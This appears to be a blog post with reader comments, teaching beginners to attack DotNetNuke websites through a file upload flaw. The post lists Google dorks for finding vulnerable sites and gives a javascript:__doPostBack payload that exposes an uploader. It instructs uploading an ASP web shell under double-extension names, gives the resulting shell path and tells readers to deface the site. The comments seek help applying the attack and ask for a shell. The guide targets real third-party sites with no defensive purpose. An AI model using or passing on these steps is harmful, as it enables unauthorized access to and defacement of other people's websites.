DNN Attack for Beginners
What is DNN ?
DNN stands for Dot Net Nuke. It have an Remote Arbitrary File Upload vulnerability. Simply said uploading vulnerability.
Finding vulnerable websites
Find vulnerable websites by GOOGLE dorks:
inurl:/fck/fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx
I got a target,
Select "File" from list.
The in URL bar paste the JavaScript:
javascript:__doPostBack('ctlURL$cmdUpload','')
Now there appear a UPLOADING bar on page. As seen below:
Now upload your ASP shell as "shell.asp;.txt , shell.asp;.jpg"
Your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"
Now you have a shell access to the website. Now deface the website.
Hope you Enjoy.........
bro,i couldn't use the javascript code in the url bar......what can i do??
ReplyDeleteDue to security reasons in all modern browsers the JAVASCRIPT is turned off. You can turn it on to use JAVASCRIPT.
DeleteHelp is here
http://adf.ly/VkQle
bro,i couldn't use the javascript code in the url bar......what can i do??
ReplyDeleteDue to security reasons in all modern browsers the JAVASCRIPT is turned off. You can turn it on to use JAVASCRIPT.
DeleteHelp is here
http://adf.ly/VkQle
Tnx,
ReplyDeletebut bro,in my browser JAVASCRIPT is turned on,,,i tried it many times but failed ;),,,help me,plz,what can i do??
It may be possible that the site is patched by the admin. This exploit is too old. Please use another site to test your exploit.
Deletebro,i have used firefox 4 to do such,,n now it's done,,,,but i don't have any asp shell,,may i get it from u??
Delete